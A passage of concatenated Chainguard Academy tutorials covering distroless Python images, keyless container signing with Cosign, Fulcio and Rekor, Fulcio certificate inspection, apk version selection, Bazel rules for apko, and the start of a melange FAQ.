should give you the same result as before. docker run --rm linky-demo:distroless But these images are not the same. The following command will give you a glimpse of their differences: docker images linky-demo REPOSITORY TAG IMAGE ID CREATED SIZE linky-demo distroless 619ef9b6c52d 6 seconds ago 90.3MB linky-demo latest 4832e9093348 4 minutes ago 110MB You’ll notice that the :distroless version is significantly smaller, because it doesn’t carry along all the software necessary to build the application. More important than size, however, is the smaller attack surface that results in fewer CVEs. Final Considerations In this tutorial, we’ve demonstrated how to build a Python image from scratch using the wolfi-base image. We’ve also shown how to compose a distroless image using a multi-stage build. This technique is useful when you need to reduce the attack surface of your application runtime, which is especially important in security-sensitive environments. If your application runtime requires system dependencies that are not already included within a distroless variant available in our images directory, you can still use a builder image (identified by the -dev suffix) or the wolfi-base image in a standard Dockerfile to build a suitable runtime. These images come with apk and a shell, allowing for further customization based on your application’s requirements. If you can’t find an image that is a good match for your use case, or if your build has dependencies that cannot be met with the regular catalog, get in touch with us for alternative options. --- ### How to Keyless Sign a Container Image with Sigstore URL: https://edu.chainguard.dev/open-source/sigstore/how-to-keyless-sign-a-container-with-sigstore/ Last Modified: August 24, 2022 Tags: Cosign, Sigstore, Procedural An earlier version of this material was published in the lab in chapter 5 of the Linux Foundation Sigstore course. This tutorial will bring some of the components of Sigstore together in an example project. In this demonstration, we’ll be using GitHub Actions to perform keyless signing on a sample container. In this example, we’ll use a Django container that displays a generic “Hello, World” style landing page. Django is a Python web framework. Prerequisites You should have the following in place before continuing: The latest version of Docker and Docker Compose installed, and an account on Docker Hub. At the time of writing (June 2022), Docker Engine should be version 20.10 and Docker Compose should be version 2.6. If you are on macOS, you will need to use Docker Desktop; refer to the official documentation for your operating system to ensure that your system meets the necessary requirements. Docker Desktop should be version 4.8 or higher. Cosign installed, follow How to Install Cosign. The Rekor CLI installed, follow the installation guide Familiarity with Git, GitHub, and GitHub Actions is helpful, but we’ll provide some context and also walk you through setting up a GitHub account. With these prerequisites in place, let’s begin. Sign up for GitHub To create a GitHub account, navigate to https://github.com/join and fill in a valid username, email address, and password. For a username, you may want to think about whether you want a name that represents your name, or a more anonymous one. You may want to click off the email marketing box. You should also verify your account. GitHub provides additional documentation on signing up for an account. You’ll be using a free personal account to work with GitHub. If you are not familiar with Git and GitHub, you can review the official GitHub official docs on About Git. We will walk you through the relevant commands in this section. GitHub Actions can perform CI/CD on your repository. You can learn more about GitHub Actions through the official GitHub docs. We will walk you through the relevant files here. Create a GitHub Repository When you are logged into GitHub, create a new repository by clicking on the + button in the upper right-hand corner of the page (next to your user icon). The menu will drop down and you can select New repository. On the Create a new repository page, you can create a repository, you can leave the defaults, but write a meaningful name for the Repository name field, such as django-keyless-signing. Note that you’ll need to keep the repository public so that the signed image you build will be able to be uploaded to Rekor’s public transparency log. Create a Local Directory for the Repository Now, you’ll need to create a local directory for this repository. For our example, we’ll want our path to be ~/Documents/GitHub/django-keyless-signing, but you can choose an alternate path. Create the GitHub directory if necessary, and then navigate into that folder. cd ~/Documents/GitHub Within the GitHub folder, create the new directory for your repository, and move into it. mkdir django-keyless-signing && cd $_ You’ll be making a few files in this directory that you’ll then push up to the GitHub repository. Create Django Container Files First, create a requirements.txt file for your Django container. This is a common file in Python projects that you can run to get the necessary dependencies at the right versions. The Django Docker container will pull from this file to set up the image. You need the Django package, and Psycopg, which is a PostgreSQL database adapter for Python. Create your file with a text editor like nano. nano requirements.txt Once the file is open, write the following into it to set and pin your dependencies. Django>=3.0,<4.0 psycopg2>=2.8 Save and close the file. Next, create your Dockerfile, again with a text editor like nano. nano Dockerfile Within this file you will set up the version of Python, the environments, and tell the container to install the dependencies in requirements.txt. # syntax=docker/dockerfile:1 FROM python:3 ENV PYTHONDONTWRITEBYTECODE=1 ENV PYTHONUNBUFFERED=1 WORKDIR /code COPY requirements.txt /code/ RUN pip install -r requirements.txt COPY . /code/ Once you are satisfied that your Dockerfile reflects the content above, you can save and close the file. Finally, you’ll create a docker-compose.yml file. This file allows you to document and configure all of your application’s service dependencies. If you would like to read more about Docker Compose, please refer to the official Docker documentation. Again, use nano or similar text editor to create your file. nano docker-compose.yml You can add the following contents to this file. This sets up the environment and Postgres database, and can build the web server on port 8000 of the present machine. version: "3.9" services: db: image: postgres volumes: - ./data/db:/var/lib/postgresql/data environment: - POSTGRES_DB=postgres - POSTGRES_USER=postgres - POSTGRES_PASSWORD=postgres web: build: . command: python manage.py runserver 0.0.0.0:8000 volumes: - .:/code ports: - "8000:8000" environment: - POSTGRES_NAME=postgres - POSTGRES_USER=postgres - POSTGRES_PASSWORD=postgres depends_on: - db At this point, your Django container is set up. You can run the tree command to review the file structure. Note, tree may not come automatically installed on your machine; use your package manager to install it if you would like to run this optional command. tree . ├── Dockerfile ├── docker-compose.yml └── requirements.txt 0 directories, 4 files If your output matches the output above, you are all set to continue. Steps to Automate Keyless Signing We next create a GitHub Actions YAML file. There is some boilerplate in this file common to GitHub Actions, but the high-level overview of this is that we need to enable OIDC, install Cosign, build and push the container image, and then sign the container image. We’ll discuss each of these steps here, and then write the entire file in the next section. After a cron job to automate the Actions, your first step will be to enable GitHub Actions OIDC tokens. Fulcio is a free root certificate authority that issues certificates based on an OIDC email address. This is essentially enabling the certificate step of our action. The key piece here is id-token: write, which you will have under build and under jobs in your Actions workflow. jobs: build: runs-on: ubuntu-latest permissions: contents: read packages: write id-token: write The rest of this build is telling us that the container is running on the latest version of Ubuntu, that the contents are to be read, and the packages are to be written. The id-token: write line enables our job to create tokens as this workflow. This permission may only be granted to workflows on the main repository, so it cannot be granted during pull request workflows. You can learn more about GitHub Actions’s OIDC support from their document on “Security hardening your deployments.” The next major part of this YAML file is installing Cosign. - name: Install cosign uses: sigstore/cosign-installer@main Cosign is available through the GitHub Action Marketplace, which is why we can add it to our GitHub Action as above. You can pin your workflow to a particular release of Cosign. For example, here you will use version 2.1.1. - name: Install cosign uses: sigstore/cosign-installer@main with: cosign-release: 'v2.1.1' After this step, there will be some actions to setup the Docker build, log into the GitHub Container Registry, and build and push the container image. The next piece that is most relevant to our work with Sigstore is signing the container image. - name: Sign the container image run: cosign sign --yes ghcr.io/${{ github.repository }}@${{ steps.push-step.outputs.digest }} Here you’ll run the cosign sign command on the container we are pushing to GitHub Container Registry with the relevant variable calling our repository and digest. Because we are doing a public repository, this will automatically be pushed to the public instance of the Rekor transparency log Now that you understand the main pieces of the YAML file, let’s create it and review the contents of the entire file. Create GitHub Actions File You’ll next create a hidden directory called .github and a subdirectory called workflows. Ensure that you are in your django-keyless-signing and create these two directories. mkdir .github && cd $_ mkdir workflows && cd $_ Within this directory, you’ll be creating a YAML file to run a GitHub Action Workflow. nano docker-publish.yml This is how we will be building, publishing, and signing the container. We will start by naming it Publish and Sign Container Image and then will set up a scheduled cron job for continuous running, and also when there is a push to the main branch or pull request that is merged into the main branch. The rest of the file will follow what we discussed in the previous section. name: Publish and Sign Container Image on: schedule: - cron: '32 11 * * *' push: branches: [ main ] # Publish semver tags as releases. tags: [ 'v*.*.*' ] pull_request: branches: [ main ] jobs: build: runs-on: ubuntu-latest permissions: contents: read packages: write id-token: write steps: - name: Checkout repository uses: actions/checkout@v2 - name: Install cosign uses: sigstore/cosign-installer@main with: cosign-release: 'v1.4.1' - name: Setup Docker buildx uses: docker/setup-buildx-action@v2 - name: Log into ghcr.io uses: docker/login-action@master with: registry: ghcr.io username: ${{ github.actor }} password: ${{ secrets.GITHUB_TOKEN }} - name: Build and push container image id: push-step uses: docker/build-push-action@master with: push: true tags: ghcr.io/${{ github.repository }}:latest - name: Sign the container image run: cosign sign ghcr.io/${{ github.repository }}@${{ steps.push-step.outputs.digest }} Now, your demo Django container project is complete and ready for GitHub Actions to run on it. Verify that your project is configured correctly. Run the tree command with the -a flag from your project’s root directory to view invisible directories. cd ~/Documents/GitHub/django-keyless-signing tree -a . ├── .github │ └── workflows │ └── docker-publish.yml ├── Dockerfile ├── docker-compose.yml └── requirements.txt 2 directories, 4 files If your setup matches, we can proceed. Generate GitHub Personal Access Token In order to use GitHub on the command line and run GitHub Actions, you’ll need a personal access token. In your web browser, navigate to https://github.com/settings/tokens in order to set those up. You’ll click on the Generate new token button and fill out the form on the next page. Fill in the Note field about what the token is for, the 30 days expiration is adequate, and you’ll need to select the repo, workflow, and write:packages scopes, as indicated in the screenshot below. With this filled out, you can click on the green Generate token button at the bottom of the page and then your token will display on the page. Be sure to copy this token; you won’t have access to it again. You’ll be using this token to authenticate on the command line. Initialize Git Repository and Push Changes From your local repository of django-keyless-signing you will be initializing your repository to use with Git. git init Next, you will add the files you created to the Git stage. git add .github Dockerfile docker-compose.yml requirements.txt At this point, you can check that your Git stage is all set for committing and then pushing your changes to the remote GitHub repository. git status On branch main No commits yet Changes to be committed: (use "git rm --cached <file>..." to unstage) new file: .github/workflows/docker-publish.yml new file: Dockerfile new file: docker-compose.yml new file: requirements.txt The output indicates that changes are ready to be committed. You will now commit with a message, as in the next command. git commit -m "first commit" [main (root-commit) 301800b] first commit 4 files changed, 93 insertions(+) create mode 100644 .github/workflows/docker-publish.yml create mode 100644 Dockerfile create mode 100644 docker-compose.yml create mode 100644 requirements.txt Now, set up the main branch as main. git branch -M main So far we have not connected to the remote repository. You should add that repository now. This will be the URL for your repository plus .git at the end. Ensure that you replace github-username with your actual username on GitHub. git remote add origin https://github.com/github-username/django-keyless-signing.git With this set up, you’ll be able to push your changes to the remote repository that’s hosted on GitHub. git push -u origin main With this command, you will be prompted to enter your GitHub username and the GitHub personal access token. In the first prompt, enter your GitHub username, where it reads Username. In the second prompt, where it reads Password, enter your personal access token, not your GitHub password. Username for ‘https://github.com’: Password for ‘https://github-username@github.com’: Once you enter these, you’ll receive output that your changes were committed to the remote repository. Enumerating objects: 8, done. Counting objects: 100% (8/8), done. Delta compression using up to 10 threads Compressing objects: 100% (5/5), done. Writing objects: 100% (8/8), 1.62 KiB | 1.62 MiB/s, done. Total 8 (delta 0), reused 0 (delta 0), pack-reused 0 To https://github.com/github-username/django-keyless-signing.git * [new branch] main -> main branch 'main' set up to track 'origin/main'. With this complete, you can navigate to the URL of your GitHub repository. Confirm Keyless Signing via GitHub Actions With your repository set up, you can move to the Actions tab of your GitHub repository. Here, you’ll be able to inspect the workflows that have run. Since there is only one workflow in this repo, you can inspect the one for first commit. Here, a green checkmark and build will be displayed on the page under docker-publish.yml. This action ran when you pushed your code into the repository. You can click on build and inspect the steps of the action. Your page will appear similar to the following. Ensure that your action ran and that your output is similar. From here, you can click into each step of the build process and dial in further. Click into Sign the container image. This will dropdown and provide you with more information, like so. Run cosign sign ghcr.io/github-username/django-keyless-signing@sha256:a53e24bd4ab87ac4764fb8736dd76f388fd2672c1d372446c9a2863e977f6e54 Generating ephemeral keys... Retrieving signed certificate... client.go:196: root pinning is not supported in Spec 1.0.19 Successfully verified SCT... tlog entry created with index: XXXXXXX Pushing signature to: ghcr.io/github-username/django-keyless-signing This provides a bit of information, including the SHA, the Rekor log index number (as indicated by tlog entry created with index), and the URL of the container that the signature was pushed to. You can also inspect the image itself under Packages on the main page of your repository. If you would like, you can pull down the Docker image. This is not necessary for our next step, where we will check that the signature was signed and that the signature is in the Rekor transparency log. Verify Signatures With your container signed by Cosign keyless signing in GitHub Actions, you next need to verify that everything worked as expected and that the container is indeed signed, and that an entry for that was generated in Rekor. You can do that by using the cosign verify command against the published container image. cosign verify ghcr.io/github-username/django-keyless-signing \ --certificate-identity https://github.com/github-username/django-keyless-signing/.github/workflows/docker-publish.yml@refs/heads/main \ --certificate-oidc-issuer https://token.actions.githubusercontent.com | jq Your output should be similar to the following, though note that the strings are abbreviated. Verification for ghcr.io/github-username/django-keyless-signing:latest -- The following checks were performed on each of these signatures: - The cosign claims were validated - Existence of the claims in the transparency log was verified offline - Any certificates were verified against the Fulcio roots. [ { "critical": { "identity": { "docker-reference": "ghcr.io/github-username/django-keyless-signing" }, "image": { "docker-manifest-digest": "sha256:a4aa08ce4593" }, "type": "cosign container image signature" }, "optional": { "Bundle": { "SignedEntryTimestamp": "8XFlAArYeA", "Payload": { "body": "E5ha0V5VFVSTmVFNXFSWGROUkZwaFJuY3dlVTFxUVRKTlJFMTRUbXBKZDAxRVZtRk5", "integratedTime": 1654272608, "logIndex": XXXXXXX, "logID": "a4aa08ce4593" } }, "Issuer": "https://token.actions.githubusercontent.com", "Subject": "https://github.com/github-username/django-keyless-signing/.github/workflows/docker-publish.yml@refs/heads/main" } } ] You can also review the log on Rekor by using the logIndex as above, which matches the tlog entry created with index you found in the output from the GitHub Actions. You can use either verify or get with the Rekor CLI. In the first case, your command will be formatted like so and provide a lot of output with a full inclusion proof. Note that this output is abbreviated. Substitute the Xs in the command for your log index number. rekor-cli verify --rekor_server https://rekor.sigstore.dev --log-index XXXXXX Current Root Hash: 1ce1a05f2ec146e503d78649c093 Entry Hash: e739fb04525a9e8a0d590b9f944714ce469c Entry Index: XXXXXX Current Tree Size: 2251200 Inclusion Proof: SHA256(0x01 | 3742364ed095572728c5c4c6abcc55cda3111833bb01260b6dfd50ce0214bbfe | b0f3127874d6ce2ca520797f4ab9e739fb04525a9e8a0d590b9f944714ce469c) = b94433c839343e37b42cdf2281731571971202c77defdae51a6c386a4d1bfb7b … SHA256(0x01 | efb36cfc54705d8cd921a621a9389ffa03956b15d68bfabadac2b4853852079b | 5a35a58d7624edfb9adf6ea9f0cbed558f5e5d45ca91acb5243757d72f1b2454) = 2c0c0e511e071ab024da0ebd89f67b39ae7a1ce1a05f2ec146e503d78649c093 In the second instance, you’ll receive JSON formatted output. Note the output here is abbreviated. Substitute the Xs in the command for your log index number. rekor-cli get --rekor_server https://rekor.sigstore.dev --log-index XXXXXX LogID: c0d23d6ad406973f9559f3ba2d1ca01f84147d8ffc5b8445c224f98b9591801d Index: XXXXXXX IntegratedTime: 2022-06-03T17:12:38Z UUID: 0d590bf944714ce469c Body: { "HashedRekordObj": { "data": { "hash": { "algorithm": "sha256", "value": "abb1bef9a31c634cfc" } }, "signature": { "content": "RxAva1EnlCS5AIhAN", "publicKey": { "content": "jeTlvWldGa2N5OXRZV2x1TUM0fNpc0dBUVFCZzc4d0FRUUVJRkIxWW14cGMyZ2cKWVc1" } } } } Congratulations! You have signed a container with Cosign through GitHub Actions by using OIDC through Fulcio, and can verify this on the Rekor log. --- ### How to Generate a Fulcio Certificate URL: https://edu.chainguard.dev/open-source/sigstore/fulcio/how-to-generate-a-fulcio-certificate/ Last Modified: August 19, 2022 Tags: Fulcio, Procedural An earlier version of this material was published in the Fulcio chapter of the Linux Foundation Sigstore course. In this tutorial, we are going to create and examine a Fulcio certificate to demonstrate how Fulcio can work in practice. To follow along, you will need Cosign installed on your local system. If you haven’t installed Cosign yet, you can follow the instructions described in How to Install Cosign, or you can follow one of the installation methods described in the official documentation. Please note that using Cosign requires Go v1.16 or higher. The Go Project provides official download instructions. To get started, place some text in a text file. For instance: echo "test file contents" > test-file.txt Next, let’s generate a key pair with Cosign: cosign generate-key-pair Enter and confirm a password after running this command. Then, use Cosign to sign this test-file.txt, outputting a Fulcio certificate named “fulcio.crt.base64”. The sign-blob subcommand allows Cosign to sign a blob. This command will open a browser tab and will require you to sign in through one of the OIDC providers: GitHub, Google, or Microsoft. This step represents the user proving their identity. cosign sign-blob test-file.txt --output-certificate fulcio.crt.base64 --output-signature fulcio.sig After authentication, you can close the browser tab. In your terminal, you will receive output similar to this: Using payload from: test-file.txt Generating ephemeral keys... Retrieving signed certificate... Note that there may be personally identifiable information associated with this signed artifact. This may include the email address associated with the account with which you authenticate. This information will be used for signing this artifact and will be stored in public transparency logs and cannot be removed later. By typing 'y', you attest that you grant (or have permission to grant) and agree to have this information stored permanently in transparency logs. Are you sure you would like to continue? [y/N] y If you agree, enter y and continue. You will receive output like this: Your browser will now be opened to: https://oauth2.sigstore.dev/auth/auth?access_type=online&client_id=sigstore&code_challenge=… Successfully verified SCT… using ephemeral certificate: —–BEGIN CERTIFICATE—– (…) —–END CERTIFICATE—– tlog entry created with index: 2494952 Signature wrote in the file fulcio.sig using ephemeral certificate: —–BEGIN CERTIFICATE—– (…) —–END CERTIFICATE—– Certificate wrote in the file fulcio.crt.base64 The output indicates that Sigstore is using ephemeral keys to generate a certificate for `test-file.txt`. The certificate, which we'll verify in the next section, is saved to a file named `fulcio.crt.base64`. --- ### How to Inspect and Verify Fulcio Certificates URL: https://edu.chainguard.dev/open-source/sigstore/fulcio/how-to-inspect-and-verify-fulcio-certificates/ Last Modified: August 19, 2022 Tags: Fulcio, Procedural An earlier version of this material was published in the Fulcio chapter of the Linux Foundation Sigstore course. To inspect a certificate generated by Fulcio, we will first decode it with the base64 command line tool, which is used for encoding and decoding binary to text. Base64 is widely used on the world wide web for binary-to-text encoding. You can check whether the tool is installed by checking whether base64 --help will run. If not, install Base64 with the package manager of your choice, such as apt or Homebrew for macOS. We will also use a third-party tool called step to inspect the decoded certificate. To install step, which is a tool related to public key infrastructure workflows, follow the instructions from their official documentation. In addition to having base64 and step installed on your machine, you should also have Cosign installed, which you can achieve by following the instructions described in How to Install Cosign. With these prerequisites in place, you are ready to begin. First, we’ll decode the certificate with Base64. If you don’t have a certificate ready to inspect, you can generate one by following How to Generate a Fulcio Certificate. base64 -d < fulcio.crt.base64 > fulcio.crt Then, inspect the certificate using step’s inspect command. step certificate inspect fulcio.crt A sample output is below. Pay attention especially to the x509v3 Subject Alternative Name field, which is the e-mail associated with the party that created the signature and the issuer, which is Sigstore. The ten minute time window of validity also details the period of time for which the signature is valid. Certificate: Data: Version: 3 (0x2) Serial Number: 445971695346061852979091305347141417164194935 (0x13ff8105719cba6ad0caa5ce9f34603ce9c477) Signature Algorithm: ECDSA-SHA384 Issuer: O=Sigstore.dev,CN=sigstore Validity Not Before: Mar 24 20:14:37 2022 UTC Not After : Mar 24 20:24:36 2022 UTC Subject: Subject Public Key Info: Public Key Algorithm: ECDSA Public-Key: (256 bit) X: 4b:fc:7d:9c:4a:56:30:75:67:fd:d6:1f:a6:f3:05: 04:ff:c8:ad:c6:2c:5f:ea:59:f9:ed:07:fa:c2:ae: 04:19 Y: 15:44:38:f3:77:87:63:91:0c:08:b6:4f:ca:67:36: 3f:38:dc:fc:bc:07:5c:8f:ec:d3:b2:31:66:a8:3d: fa:98 Curve: P-256 X509v3 extensions: X509v3 Key Usage: critical Digital Signature X509v3 Extended Key Usage: Code Signing X509v3 Basic Constraints: critical CA:FALSE X509v3 Subject Key Identifier: 5A:F0:DE:DA:CF:D0:73:F1:5A:88:B2:9F:8E:03:5F:51:6E:8C:57:19 X509v3 Authority Key Identifier: keyid:58:C0:1E:5F:91:45:A5:66:A9:7A:CC:90:A1:93:22:D0:2A:C5:C5:FA X509v3 Subject Alternative Name: critical email:email@example.com 1.3.6.1.4.1.57264.1.1: https://github.com/login/oauth Signature Algorithm: ECDSA-SHA384 30:65:02:31:00:98:00:17:7a:98:f2:d4:89:05:d2:7a:91:93: 73:92:e6:3f:9d:69:a5:7c:28:9f:60:72:29:e3:b7:d3:5e:2f: 1a:00:35:99:4f:92:da:02:cd:ec:83:49:f3:27:3a:39:21:02: 30:04:a6:0c:42:a4:38:d9:ac:da:8f:b5:2f:4c:f5:ad:4b:d4: c6:7d:8b:43:46:91:c1:9d:80:43:44:a9:26:26:26:0f:cf:e2: ab:aa:ef:6d:ec:1c:28:df:d3:ac:aa:fd:1b We will then verify the certificate against the Fulcio certificate authority root, by using step certificate verify to execute the certificate path validation algorithm for x.509 certificates. step certificate verify fulcio.crt --roots ~/.sigstore/root/targets/fulcio_intermediate_v1.crt.pem The final command checks the signature in the fulcio.sig file, tracing the certificate up to the Fulcio root certificate. You’ll need to use the identity flags --certificate-ide ntity which corresponds to the email address of the signer, and --certificate-oidc-issuer which corresponds to the OIDC provider that the signer used. For example, a Gmail account using Google as the OIDC issuer, will be able to be verified with the following command: cosign verify-blob test-file.txt \ --signature fulcio.sig \ --cert fulcio.crt.base64 \ --certificate-identity username@gmail.com \ --certificate-oidc-issuer https://accounts.google.com You will receive output following this command. You should receive a Verified OK message if the signature, certificate, and identities match. --- ### Package Version Selection URL: https://edu.chainguard.dev/open-source/wolfi/apk-version-selection/ Last Modified: November 6, 2023 Tags: Chainguard Containers, Wolfi, apk, melange This document explains how to specify version constraints for packages installed with the apk tool, as well as apko and melange. Understanding version selection will enable you to choose the version you’re looking for, determine what updates and vulnerability fixes you receive, and can allow you to reproduce an image’s digest through exact version matching. Version selection in apko and melange All the examples in this document focus on usage with the apk tool, but the same semantics apply to apk add as well as references in an apko or melange packages field: environment:packages:- go>1.21 # install anything newer than 1.21, excluding 1.21- foo=~4.5.6# install any version with a name starting with "4.5.6" (e.g., 4.5.6-r7)- python3 # install the latest stable version of python3.Basic Usage apk add go This will install the latest stable version of Go. This is nearly always what you want, since it gives you stable software, with as many updates and vulnerability fixes as possible. See below for information on the behavior of pre-release versions. Fuzzy Matching You can also use fuzzy version matching. For example, if you don’t care about the epoch, you can request any version of Go with a version string starting in 1.21.1: apk add go=~1.21.1 Or you can add any 1.21: apk add go=~1.21 If multiple versions match that prefix (e.g., 1.21.1-r0, 1.21.1-r1, etc.), then the highest numbered next version segment will be chosen. Fuzzy matching means you can request Go 1.21 without getting 1.20 or 1.22, like you would with &lt; or >. Wolfi provides a separate go-1.21 package that provides:go=1.21.x so in Go’s case you can request go-1.21 and get the same behavior as go~1.21. But this might not be the same case for all packages. The operators ~, ~= and =~ are equivalent, and all do the same thing. You can also use fuzzy matching to request a major version prefix: apk add go=~1 Go will not have a version 2, but other packages might. For example, erlang=~26 will match any release of Erlang in the 26 major version, and not match Erlang 25 and below or 27 and above. erlang~2 will not match Erlang 26 or 27. It only fuzzy matches whole segments of a semantic versioning version string. Version Constraints To request a minimum or maximum acceptable version of a package to install, you can use >, <, >= and <=: apk add go>1.20 # install anything newer than 1.20, excluding 1.20.0, but including 1.20.1 apk add go<1.20 # install anything older than 1.20, excluding 1.20.0, but including 1.19.14 apk add go>=1.20 # install anything newer than 1.20, including 1.20.0 apk add go<=1.20 # install anything older than 1.20, including 1.20.0 This comparison logic is aware of semantic versioning semantics, so 1.9.10 is less than 1.10, and 1.9.9 is less than 1.9.10, even though they may be alphabetically sorted later. Version constraints can be useful when you want to ensure a minimum or maximum major or minor version, but still want to receive minor or patch updates. Fuzzy matching can produce the same behavior – go~1.20 is equivalent to go>=1.20 for example. Installing Future Versions Using apk add go installs the latest stable release of Go. For most packages, there is no distinction between the “latest” and “latest stable” release. Some projects, like Go, Node, Python, etc., produce pre-release versions before, or have more nuanced release maturity and support processes. Please refer to the respective larger project for more information. Go versions often have Release Candidates. For example, when Go 1.21 is the latest release, the Go team may prepare for Go 1.22 by releasing a Go 1.22_rc1 to let folks try it out before it’s fully released. To install this version, you can specify the pre-release package name, which for go will be go-1.22: apk add go-1.22 Note that this string uses a dash (-), which means it’s specifying the full name of the package, which Wolfi’s convention is go-1.22. Since it doesn’t include any other version constraint or fuzzy matching, it’s requesting “the latest version of a package named go-1.22”, which may install go-1.22 with version 1.22_rc3. When Go 1.22 is fully released, it will become the latest release of Go and provides:[go=$version], so apk add go will install Go 1.22.0. Exact Version Matching You can also specify an exact version and epoch to install: apk add go=1.21.1-r0 This will install exactly this version and epoch, as long as that is available. Because package updates or vulnerability fixes won’t be picked up, this is not generally useful for day-to-day usage. However, this is useful for reproducing an environment exactly, and it’s the form we use in the resolved apko configuration attestation we attach to images. This makes it clear exactly what versions of which packages were installed in an image, so you can reproduce it with apko to get exactly the same image digest. --- ### Bazel Rules for apko URL: https://edu.chainguard.dev/open-source/build-tools/apko/bazel-rules/ Last Modified: May 2, 2024 Tags: apko, Procedural rules_apko is an open source plugin for Bazel that makes it possible to build secure, minimal Wolfi-based container images using the popular Bazel build system. This wraps the apko tool for use under Bazel. Prerequisites First, be sure you have Bazel installed, you can follow the Bazel installation guide for more details. Next, rules_apko requires a one-time setup to configure Bazel to be able to make partial fetches. Paste the following into your root BUILD file. load("@rules_apko//apko:defs.bzl", "apko_bazelrc") apko_bazelrc() Note: By default, apko_bazelrc will generate .bazelrc to accommodate for fetching from dl-cdn.alpinelinux.org and packages.wolfi.dev. this can be configured by passing the repositories attribute to apko_bazelrc() call. Then, run the following command. bazel run @@//:apko_bazelrc && chmod +x .apko/range.sh Finally, paste this into your preferred `.bazelrc` file, # Required for rules_apko to make range requests try-import %workspace%/.apko/.bazelrc Review additional initial setup documentation updates in the rules_apko repo. Installation To install v1.0.0, you can follow one of the options below. For other releases, follow the instructions in the release notes from the release you wish to use: https://github.com/chainguard-dev/rules_apko/releases. Using Bzlmod with Bazel 6 Enable with common --enable_bzlmod in .bazelrc. Add to your MODULE.bazel file: bazel_dep(name = "rules_apko", version = "1.0.0-rc1") Using WORKSPACE Paste this snippet into your file: load("@bazel_tools//tools/build_defs/repo:http.bzl", "http_archive") http_archive( name = "rules_apko", sha256 = "5c91a2322bec84a0005dd8178495775938b581053812e70d21b030bef3625623", strip_prefix = "rules_apko-1.0.0-rc1", url = "https://github.com/chainguard-dev/rules_apko/releases/download/v1.0.0-rc1/rules_apko-v1.0.0-rc1.tar.gz", ) ###################### # rules_apko setup # ###################### # Fetches the rules_apko dependencies. # If you want to have a different version of some dependency, # you should fetch it *before* calling this. # Alternatively, you can skip calling this function, so long as you've # already fetched all the dependencies. load("@rules_apko//apko:repositories.bzl", "apko_register_toolchains", "rules_apko_dependencies") rules_apko_dependencies() apko_register_toolchains(name = "apko") load("@rules_apko//apko:translate_lock.bzl", "translate_apko_lock") translate_apko_lock( name = "example_lock", lock = "@//:apko.lock.json", ) load("@example_lock//:repositories.bzl", "apko_repositories") apko_repositories() Rules Public API re-exports apko_image apko_image(name, architecture, args, config, contents, output, tag) Build OCI images from APK packages directly without Dockerfile. This rule creates Alpine images using the apko.yaml configuration file and relies on cache contents generated by translate_lock to be fast. apko_image( name = "example", config = "apko.yaml", contents = "@example_lock//:contents", tag = "example:latest", ) The label @example_lock//:contents is generated by the translate_lock extension, which consumes an ‘apko.lock.json’ file. For more details, refer to the apko cache documentation. An example demonstrating usage with rules_oci: apko_image( name = "alpine_base", config = "apko.yaml", contents = "@alpine_base_lock//:contents", tag = "alpine_base:latest", ) oci_image( name = "app", base = ":alpine_base" ) For more examples checkout the examples directory. Attributes Name Description Type Mandatory Default name A unique name for this target. Name required architecture the CPU architecture which this image should be built to run on. See https://github.com/chainguard-dev/apko/blob/main/docs/apko_file.md#archs-top-level-element String optional "" args additional arguments to provide when running the apko build command. List of strings optional [] config Label to the apko.yaml file. Label required contents Label to the contents repository generated by translate_lock. See apko-cache documentation. Label required output - String optional “oci” tag tag to apply to the resulting docker tarball. only applicable when output is docker String required apko_bazelrc apko_bazelrc(name, repositories, kwargs) Helper macro for generating .bazelrc and range.sh files to allow for partial package fetches. Review Prerequisites documentation for more information. Parameters Name Description Default Value name name of the target “apko_bazelrc” repositories list of repositories to generate .bazelrc for [“dl-cdn.alpinelinux.org”, “packages.wolfi.dev”] kwargs passed to expanding targets. only well known attributes such as tags testonly ought to be present. none Fetching and Caching Contents To ensure efficient operation, the apko_image rule must maintain a cache of remote contents that it fetches from repositories. While outside of Bazel, apko manages its own cache, under Bazel, the cache must be maintained by Bazel to ensure correctness and speed. Therefore, Bazel needs to know what needs to be fetched and from where to cache these HTTP requests and provide them to apko as required. The apko.lock.json file contains all the necessary information about how to perform the HTTP fetches required by apko to build the container image. Generating the Lock File Note: Documentation for lockfile generation will be added to the repository docs once the apko resolve command is available. Using translate_lock Having just the apko.lock.json file alone is insufficient; all the information needs to be converted into apk_<content_type> repository calls to make them accessible to Bazel. The translate_lock tool accomplishes this by taking the apko.lock.json file and dynamically generating the required Bazel repositories. translate_lock will create a new bazel repository named after itself. This repository will also have a target named contents, which you can pass to apko_image: apko_image( name = "lock", config = "apko.yaml", # name of the repository is the same translate_lock! contents = "@examples_lock//:contents", tag = "lock:latest", ) Usage with bzlmod apk = use_extension("//apko:extensions.bzl", "apko") apk.translate_lock( name = "examples_lock", lock = "//path/to/lock:apko.lock.json", ) use_repo(apk, "examples_lock") Usage with Workspace load("@rules_apko//apko:translate_lock.bzl", "translate_apko_lock") translate_apko_lock( name = "example_lock", lock = "//path/to/lock:apko.lock.json", ) load("@example_lock//:repositories.bzl", "apko_repositories") apko_repositories() Repository rules for translating apko.lock.json translate_apko_lock translate_apko_lock(name, lock, repo_mapping, target_name) Repository rule to generate starlark code from an apko.lock.json file. Review the section above for more information. Attributes Name Description Type Mandatory Default name A unique name for this repository. Name required lock label to the apko.lock.json file. Label required repo_mapping A dictionary from local repository name to global repository name. This allows controls over workspace dependency resolution for dependencies of this repository.<p>For example, an entry "@foo": “@bar” declares that, for any time this repository depends on @foo (such as a dependency on @foo//some:target, it should actually resolve that dependency within globally-declared @bar (@bar//some:target). Dictionary: String -> String required target_name internal. do not use! String optional "" --- ### melange FAQs URL: https://edu.chainguard.dev/open-source/build-tools/melange/faq/ Last Modified: August 1, 2024 Tags: melange, FAQ Do I need to understand melange to use Chainguard Containers? No. Chainguard built melange as part of its open source tooling used for the Wolfi operating system. While you can check out the project on GitHub and learn more, it’s not a prerequisite for using or working with Chainguard Containers. How are melange packages defined? melange apks are defined declaratively using a YAML file. Is melange compatible with Alpine? Yes, melange is built to be compatible with apk-based systems including Alpine. Can I mix Alpine and Wolfi package repositories to create my melange build environment? No, it’s not possible to mix Alpine apks with Wolfi apks. Is it mandatory to sign packages with a melange key? Signing packages is not mandatory, but it is a recommended practice, because it allows users and automated systems to verify that the package they downloaded was built by the same person who signed it, and that it hasn’t been tampered with. What happens if I don’t provide a key to sign my package(s)? Some systems may prevent installation of your apk if they can’t attest the package provenance. This is the case with apko, which by default will fail any builds that reference unsigned packages. Can I create custom pipelines and embed them into my main pipeline? Although melange supports inclusion of sub-pipelines, this 